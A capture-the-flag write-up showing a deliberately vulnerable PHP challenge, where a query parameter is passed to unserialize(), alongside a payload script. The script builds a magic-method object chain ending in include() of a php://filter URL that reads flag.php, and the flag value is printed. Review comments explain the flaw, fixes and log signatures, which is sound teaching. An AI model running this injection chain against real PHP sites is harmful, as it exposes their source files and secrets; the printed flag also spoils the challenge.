题目:
index.php You are in my range!
<?php
// Deliberately vulnerable CTF challenge source, shown as printed by
// highlight_file(). The text before the opening tag appears to be the page's
// own output (the Saw constructor's echo for 'index.php') captured with it.
//
// Security summary: a request parameter is passed straight to unserialize(),
// and the classes below define magic methods (__wakeup, __toString, __get,
// __invoke) that hand control to one another and end in include(). An
// attacker-supplied object graph can therefore reach include() with a path of
// its choosing. The blocklist in Saw::__wakeup() does not prevent this; see
// the notes on that method.

// Suppresses all PHP error reporting, so failures in the code below are silent.
error_reporting(0);

class Vox
{
    // Path that __invoke() forwards to include(). Nothing in this class
    // validates it, and it is restored verbatim by unserialize().
    protected $headset;
    // Not read anywhere in the code shown.
    public $sound;

    // Includes the file named by $pulse. include() accepts stream wrappers as
    // well as plain paths, so $pulse must never derive from untrusted data.
    public function fun($pulse)
    {
        include($pulse);
    }

    // Magic method: runs when an instance is called like a function.
    // Passes the stored $headset to fun(), i.e. to include().
    public function __invoke()
    {
        $this->fun($this->headset);
    }
}

class Saw
{
    public $fearless;
    public $gun;

    // Stores $file in $fearless and echoes it followed by the banner text.
    public function __construct($file='index.php')
    {
        $this->fearless = $file;
        echo $this->fearless . ' You are in my range!'."<br>";
    }

    // Magic method: runs when the object is converted to a string.
    // The property read on the first line discards its value; its only
    // possible effect is to trigger __get() on whatever object is stored in
    // $gun['gun'] when that object has no accessible 'fearless' property.
    public function __toString()
    {
        $this->gun['gun']->fearless;
        return "Saw";
    }

    // Prints the highlighted source of the file named by $fearless when it is
    // truthy. Single underscore, so not a magic method; the only call in the
    // code shown is in the else branch at the bottom.
    public function _pain()
    {
        if($this->fearless){
            highlight_file($this->fearless);
        }
    }

    // Magic method: runs automatically on every Saw restored by unserialize().
    // Intended as a filter: when $fearless matches the blocklist it is reset
    // to "index.php".
    // NOTE(review): the filter is itself a trigger. preg_match() needs a string
    // subject, so when $fearless holds an object that defines __toString(),
    // that method is invoked right here. The check also covers only
    // Saw::$fearless; Vox::$headset, the value that actually reaches
    // include(), is never inspected. A blocklist inside __wakeup() is not a
    // substitute for refusing to unserialize untrusted input.
    public function __wakeup()
    {
        if(preg_match("/gopher|http|file|ftp|https|dict|php|\.\./i", $this->fearless)){
            echo "Does it hurt? That's right";
            $this->fearless = "index.php";
        }
    }
}

class Petal
{
    public $seed;

    // Initializes $seed to an empty array.
    public function __construct()
    {
        $this->seed = array();
    }

    // Magic method: runs when an undefined or inaccessible property is read.
    // Calls whatever is stored in $seed as a function; when $seed holds an
    // object that defines __invoke(), that method runs.
    public function __get($sun)
    {
        $Nourishment = $this->seed;
        return $Nourishment();
    }
}

// NOTE(review): root cause. unserialize() is applied to a raw query-string
// parameter, which lets the client choose which of the classes above get
// instantiated and what their properties contain. Safer options: exchange
// data as JSON (json_decode), or at minimum call
// unserialize($data, ['allowed_classes' => false]).
if(isset($_GET['ozo'])){
    unserialize($_GET['ozo']);
}else{
    // Default view: print the banner and the highlighted source of index.php.
    $Saw = new Saw('index.php');
    $Saw->_pain();
}
?>
<?php
// Execution guard: stop with 'Access Denied' unless the including script has
// defined the IN_FLAG constant.
// NOTE(review): this only controls what happens when the file is executed.
// It offers no protection when the file is read as data instead (any
// file-read primitive, or an include through an encoding stream filter),
// so a secret kept in PHP source under the web root stays exposed.
if (!defined('IN_FLAG')) {
    exit('Access Denied');
}

echo 'flag{un3eri@liz3_i3_s0_fun}';
?>
PAYLOAD:
<?php
class Vox{
    // Local stand-in for the challenge's Vox class; only its name and this
    // property end up in the serialized output.
    // The property is declared protected to match the challenge class. PHP
    // serializes protected property names with embedded NUL bytes
    // ("\0*\0headset"), which is why the script also prints a URL-encoded form.
    // The value is a php://filter stream that base64-encodes flag.php as it is
    // read, so the file's contents arrive as text instead of being executed;
    // flag.php's IN_FLAG guard therefore never runs.
    protected $headset='php://filter/read=convert.base64-encode/resource=flag.php';
}
/**
 * Local stand-in for the challenge's Saw class, used only to build a
 * serialized object graph. The class name and the two public properties
 * (in declaration order) are what serialize() records; the methods below
 * run in this script only and are not part of the serialized data.
 */
class Saw
{
    public $fearless;
    public $gun;

    /**
     * Stores $file in $fearless and echoes it followed by the banner text.
     * When $file is an object, echo converts it through __toString().
     */
    public function __construct($file = 'index.php')
    {
        $this->fearless = $file;
        echo $this->fearless, ' You are in my range!', "<br>";
    }

    /**
     * Returns an empty string, so echoing a nested Saw while the graph is
     * being built has no side effects in this script.
     */
    public function __toString()
    {
        return "";
    }

    /**
     * Replaces $fearless with a freshly constructed Saw.
     * The script shown only calls serialize(), which does not invoke
     * __wakeup(), so this method is not reached while generating output.
     */
    public function __wakeup()
    {
        $this->fearless = new self();
    }
}
/**
 * Local stand-in for the challenge's Petal class. Unlike the challenge
 * version, whose constructor sets $seed to an empty array, this one stores a
 * Vox instance, so the serialized graph carries an invokable object in $seed.
 */
class Petal
{
    public $seed;

    public function __construct()
    {
        $this->seed = new Vox();
    }
}
// Build the nested object graph the writeup demonstrates: an outer Saw whose
// $fearless is another Saw, whose $gun['gun'] entry is a Petal holding a Vox.
$inner = new Saw('flag.php');
$inner->gun['gun'] = new Petal();
$outer = new Saw($inner);

$serialized = serialize($outer);

// Raw serialized form, for reading.
print_r($serialized);
echo "</br>";

// URL-encoded form: the protected property name contains NUL bytes that do
// not survive copy/paste in raw form.
// Detection note: input of this kind is recognisable in request logs by the
// serialized-object prefix (O:<length>:"<ClassName>") and by URL-encoded NUL
// bytes (%00*%00) around protected property names.
echo urlencode($serialized);
?>
